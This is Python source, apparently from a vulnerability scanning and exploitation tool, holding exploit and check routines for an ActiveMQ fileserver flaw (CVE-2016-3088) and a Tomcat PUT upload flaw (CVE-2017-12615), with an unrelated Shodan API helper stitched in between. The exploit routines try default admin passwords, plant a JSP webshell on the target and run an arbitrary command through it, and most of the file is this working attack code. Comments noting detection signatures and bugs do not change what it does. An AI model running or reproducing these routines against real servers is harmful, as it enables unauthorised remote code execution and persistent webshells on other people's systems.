def cve_2016_3088_exp(self, cmd: str) -> None:
    """Exploit routine for CVE-2016-3088 (ActiveMQ fileserver PUT + MOVE).

    Places ``self.jsp_webshell`` under ``/api`` on the target, requests it
    with ``cmd`` and prints the response through ``verify.exploit_print``.
    Every HTTP call is made with ``verify=False``, so TLS certificates are
    never checked.

    NOTE(review): ``self.threadLock`` is acquired on the first line but is
    never released on any path of this method (the ``_poc`` siblings
    release it at the end); the lock stays held after this call returns
    and any later ``acquire()`` blocks.

    Args:
        cmd: command string appended verbatim — no URL encoding — to the
             ``cmd=`` query parameter of the final GET.

    Side effects: overwrites self.path, self.name, self.webshell, self.exp,
    self.passlist, self.pa, self.base64_p, self.p, self.headers_base64,
    self.request, self.headers_move, self.raw_data and self.r.
    """
    self.threadLock.acquire()  # never released in this method — see docstring
    vul_name = "Apache AcitveMQ: CVE-2016-3088"
    self.path = "null"  # stays "null" if no credential pair below yields a 200
    self.name = random_md5()
    self.webshell = "/" + self.name + ".jsp"
    self.exp = self.jsp_webshell
    # Hard-coded default/weak admin credentials, tried in order.  A 200 from
    # the systemProperties page means one of them is accepted; mitigation is
    # a non-default console password and restricting access to /admin.
    self.passlist = [
        "admin:123456",
        "admin:admin",
        "admin:123123",
        "admin:activemq",
        "admin:12345678"
    ]
    try:
        for self.pa in self.passlist:
            self.base64_p = base64.b64encode(str.encode(self.pa))
            self.p = self.base64_p.decode('utf-8')
            self.headers_base64 = {
                'User-Agent': self.ua,
                'Authorization': 'Basic ' + self.p
            }
            url = urljoin(self.url, "/admin/test/systemProperties.jsp")
            self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False)
            if self.request.status_code == 200:
                # [0] raises IndexError when the activemq.home row is absent;
                # unlike cve_2016_3088_poc there is no IndexError guard here,
                # so that case falls through to the generic handler below.
                self.path = \
                    re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                break
        # Reached even when no credential pair succeeded: self.headers_base64
        # then still carries the last pair tried and self.path is "null".
        self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.exp, timeout=self.timeout, verify=False)
        # Detection: a MOVE on /fileserver with a file:// Destination header
        # is the signature of this write outside the fileserver directory.
        self.headers_move = {
            'User-Agent': self.ua,
            'Destination': 'file://' + self.path + '/webapps/api' + self.webshell
        }
        self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False)
        # raw_data captures the MOVE exchange, not the final GET below.
        self.raw_data = dump.dump_all(self.request).decode(
            'utf-8', 'ignore')
        self.request = requests.get(self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd, headers=self.headers_base64, timeout=self.timeout, verify=False)
        self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
        self.r += self.request.text
        verify.exploit_print(self.r, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        # Also catches the IndexError from the re.findall()[0] above.
        verify.error_print(vul_name)
def cve_2017_12615_exp(self, cmd: str) -> None:
    """Exploit routine for CVE-2017-12615 (Tomcat PUT with a trailing slash).

    Uploads ``self.payload_cve_2017_12615`` to ``/<name>.jsp/`` and then
    GETs ``/<name>.jsp?pwd=password&cmd=<cmd>``, printing the body through
    ``verify.exploit_print``.  Both requests use ``self.headers`` and
    ``verify=False`` (no TLS certificate check).

    Detection note: a PUT whose path ends in ``.jsp/`` followed by a GET
    for the same name without the slash is the pattern to alert on.

    Args:
        cmd: command string appended verbatim (no URL encoding) to the
             ``cmd=`` query parameter.

    Side effects: overwrites self.name, self.webshell, self.payload1,
    self.payload2, self.req, self.urlcmd, self.request and self.r.
    Unlike the ActiveMQ routines this method does not touch self.threadLock.
    """
    vul_name = "Apache Tomcat: CVE-2017-12615"
    self.name = random_md5()
    self.webshell = "/" + self.name + ".jsp/"  # trailing slash is the CVE trigger
    self.payload1 = self.name  # assigned but never read in this method
    self.payload2 = self.payload_cve_2017_12615
    try:
        self.req = requests.put(self.url + self.webshell, data=self.payload2, headers=self.headers, timeout=self.timeout, verify=False)
        self.urlcmd = self.url + "/" + self.name + ".jsp?pwd=password&cmd=" + cmd
        self.request = requests.get(self.urlcmd, headers=self.headers, timeout=self.timeout, verify=False)
        self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text
        # raw_data is the dump of the PUT (self.req), not of the GET.
        raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
        verify.exploit_print(self.r, raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception as e:  # e is unused
        verify.error_print(vul_name)
def cve_2017_12615_poc(self) -> None:
    """PoC check for CVE-2017-12615 (Tomcat PUT file upload).

    Fills ``self.vul_info`` with the advisory metadata, PUTs a random
    marker (``key``) to ``/<name>.jsp/``, GETs the same path without the
    trailing slash and marks ``prt_resu`` as ``PoCSuCCeSS`` when the marker
    is echoed back.  Result is printed via ``verify.scan_print``.

    The uploaded marker file is not removed afterwards (no DELETE is sent),
    so a successful check leaves an artefact on the target.

    Side effects: mutates self.vul_info in place; overwrites self.name,
    self.webshell, self.payload1, self.payload2 and self.request; holds
    self.threadLock for the whole method.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Tomcat: CVE-2017-12615"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache Tomcat PUT 方法任意文件上传"
    self.vul_info["vul_numb"] = "CVE-2017-12615"
    self.vul_info["vul_apps"] = "Tomcat"
    self.vul_info["vul_date"] = "2017-09-20"
    self.vul_info["vul_vers"] = "7.0.0 - 7.0.81"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件上传"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Tomcat如果开启PUT方法支持则可能存在远程代码执行漏洞,漏洞编号为CVE-2017-12615。" \
                                "攻击者可以在使用该漏洞上传JSP文件,从而导致远程代码执行。"
    self.vul_info["cre_date"] = "2021-01-21"
    self.vul_info["cre_auth"] = "zhzyker"
    self.name = random_md5()
    key = random_md5()  # random marker: what is uploaded and searched for
    self.webshell = "/" + self.name + ".jsp/"  # trailing slash is the CVE trigger
    self.payload1 = key
    self.payload2 = self.payload_cve_2017_12615  # assigned but unused here
    try:
        # Only the harmless marker is uploaded by the PoC; TLS not verified.
        self.request = requests.put(self.url + self.webshell, data=self.payload1, headers=self.headers, timeout=self.timeout, verify=False)
        # [:-1] drops the trailing slash so the GET hits "/<name>.jsp".
        self.request = requests.get(self.url + self.webshell[:-1], headers=self.headers, timeout=self.timeout, verify=False)
        if key in self.request.text:
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = self.url + "/" + self.name + ".jsp"
            self.vul_info[
                "prt_info"] = "[url: " + self.url + "/" + self.name + ".jsp ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:  # e is unused
        verify.error_print(self.vul_info["prt_name"])
    # Not in a finally: skipped if one of the verify.*_print handlers raises.
    self.threadLock.release()
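def api_request(key, function, params=None, data=None, base_url='https://api.shodan.io', method='get', retries=1, proxies=None):
    """General-purpose function to create web requests to SHODAN.

    Arguments:
        key -- the Shodan API key.  It is sent as the ``key`` query
               parameter on every request, so it ends up in URLs (and
               therefore in proxy and server logs); only route these
               calls through proxies you trust.
        function -- name of the function you want to execute; appended
                    verbatim to *base_url* as the request path
        params -- dictionary of parameters for the function; may be None.
                  The caller's dict is copied, never modified.
        data -- body for the 'post' method, JSON-encoded before sending
        base_url -- API root the path is appended to
        method -- 'get' (default), 'post', 'put' or 'delete';
                  anything else is treated as 'get'
        retries -- number of additional attempts after a failed
                   connection (``retries + 1`` attempts in total)
        proxies -- a proxies mapping for the requests library

    Returns:
        Whatever the JSON response body decodes to (normally a dict
        containing the function's results).

    Raises:
        APIError -- when no attempt produced a response, when the API
                    key is rejected (HTTP 401), when the body is not
                    JSON, or when the decoded body carries an 'error'
                    entry.

    TLS verification is left at the requests default (enabled).
    """
    # Copy so the caller's dict is not mutated and ``None`` works, then add
    # the API key parameter automatically.
    query = dict(params or {})
    query['key'] = key
    url = base_url + function
    verb = method.lower()

    # Send the request.  ``response`` stays None until an attempt returns;
    # that — not a sticky error flag — is what decides failure below, so a
    # retry that succeeds after an earlier failure is reported as success.
    response = None
    attempt = 0
    while attempt <= retries:
        try:
            if verb == 'post':
                response = requests.post(
                    url,
                    json.dumps(data),
                    params=query,
                    headers={'content-type': 'application/json'},
                    proxies=proxies)
            elif verb == 'delete':
                response = requests.delete(url, params=query, proxies=proxies)
            elif verb == 'put':
                response = requests.put(url, params=query, proxies=proxies)
            else:
                response = requests.get(url, params=query, proxies=proxies)
            # Exit out of the loop on the first attempt that returns
            break
        except Exception:
            # Best-effort retry; the original also swallowed the cause here.
            attempt += 1

    if response is None:
        raise APIError('Unable to connect to Shodan')

    # Check that the API key wasn't rejected; prefer the server's own
    # error text when the 401 body is JSON with an 'error' entry.
    if response.status_code == 401:
        try:
            message = response.json()['error']
        except (ValueError, KeyError):
            message = None
        if message:
            raise APIError(message)
        raise APIError('Invalid API key')

    # Parse the text into JSON
    try:
        payload = response.json()
    except ValueError as err:
        raise APIError('Unable to parse JSON response') from err

    # Raise an exception if an error occurred
    if isinstance(payload, dict) and payload.get('error'):
        raise APIError(payload['error'])

    # Return the data
    return payload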
def cve_2016_3088_poc(self) -> None:
    """PoC check for CVE-2016-3088 (ActiveMQ fileserver PUT + MOVE).

    Fills ``self.vul_info`` with the advisory metadata, tries the
    hard-coded admin credential list against the console, PUTs a random
    marker (``self.poc``) to ``/fileserver/v.txt``, MOVEs it to a
    ``file://`` destination under ``webapps/api`` and GETs it back; the
    check succeeds when the marker is echoed.  ``verify.scan_print`` is
    called on both outcomes.  All HTTP calls use ``verify=False``.

    Side effects: mutates self.vul_info in place; overwrites self.rawdata,
    self.path, self.name, self.webshell, self.poc, self.exp, self.passlist,
    self.pa, self.base64_p, self.p, self.headers_base64, self.request and
    self.headers_move; holds self.threadLock for the whole method.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2016-3088"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache ActiveMQ 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2016-3088"
    self.vul_info["vul_apps"] = "AcitveMQ"
    self.vul_info["vul_date"] = "2016-03-10"
    self.vul_info["vul_vers"] = "< 5.14.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info[
        "vul_desc"] = "ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录"
    self.vul_info["cre_date"] = "2021-01-07"
    self.vul_info["cre_auth"] = "zhzyker"
    self.rawdata = None  # assigned but never read in this method
    self.path = "null"  # stays "null" if no credential pair yields a 200
    # Keeps only a prefix of the random name (presumably 12 of 32 hex
    # chars if random_md5 returns a full md5 — verify against the helper).
    self.name = random_md5()[:-20]
    self.webshell = "/" + self.name + ".jsp"
    self.poc = random_md5()  # random marker: uploaded and searched for
    self.exp = self.jsp_webshell  # assigned but not used by the PoC
    # Hard-coded default/weak admin credentials; mitigation is a
    # non-default console password and restricting access to /admin.
    self.passlist = [
        "admin:123456",
        "admin:admin",
        "admin:123123",
        "admin:activemq",
        "admin:12345678"
    ]
    try:
        try:
            for self.pa in self.passlist:
                self.base64_p = base64.b64encode(str.encode(self.pa))
                self.p = self.base64_p.decode('utf-8')
                self.headers_base64 = {
                    'User-Agent': self.ua,
                    'Authorization': 'Basic ' + self.p
                }
                url = urljoin(self.url, "/admin/test/systemProperties.jsp")
                self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False)
                if self.request.status_code == 200:
                    # [0] raises IndexError when the activemq.home row is absent.
                    self.path = \
                        re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                    break
        except IndexError:
            # Row missing: self.path stays "null" and the requests below
            # still go out with a "file://null/..." destination.
            pass
        # Reached even when no credential pair succeeded; self.headers_base64
        # then carries the last pair tried.  Only the marker is uploaded.
        self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.poc, timeout=self.timeout, verify=False)
        # Detection: a MOVE on /fileserver with a file:// Destination header
        # is the signature of this write outside the fileserver directory.
        self.headers_move = {
            'User-Agent': self.ua,
            'Destination': 'file://' + self.path + '/webapps/api' + self.webshell
        }
        self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False)
        self.request = requests.get(self.url + "/api" + self.webshell, headers=self.headers_base64, timeout=self.timeout, verify=False)
        if self.poc in self.request.text:
            self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info[
                "vul_payd"] = 'file://' + self.path + '/webapps/api' + self.webshell
            self.vul_info[
                "prt_info"] = "[upload: " + self.url + "/api" + self.webshell + " ] [" + self.pa + "]"
            verify.scan_print(self.vul_info)
        else:
            # Printed with prt_resu still "null".
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:  # e is unused
        verify.error_print(self.vul_info["prt_name"])
    # Not in a finally: skipped if one of the verify.*_print handlers raises.
    self.threadLock.release()